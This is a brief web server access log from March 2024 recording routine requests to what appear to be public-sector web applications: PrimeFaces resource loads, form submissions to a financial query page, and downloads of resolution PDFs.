186.85.234.113 - - [23/Mar/2024:23:40:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:40:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:40:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:40:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:40:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:40:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:40:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5614
186.29.85.194 - - [23/Mar/2024:23:40:31 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202023/2386.pdf HTTP/1.1" 200 -
186.29.85.194 - - [23/Mar/2024:23:40:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/2386.pdf HTTP/1.1" 200 481143
201.245.192.253 - - [23/Mar/2024:23:40:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
186.29.85.194 - - [23/Mar/2024:23:40:56 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202023/2355.pdf HTTP/1.1" 200 -
186.29.85.194 - - [23/Mar/2024:23:40:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/2355.pdf HTTP/1.1" 200 481247
186.85.234.113 - - [23/Mar/2024:23:41:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 33542
186.85.234.113 - - [23/Mar/2024:23:41:08 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
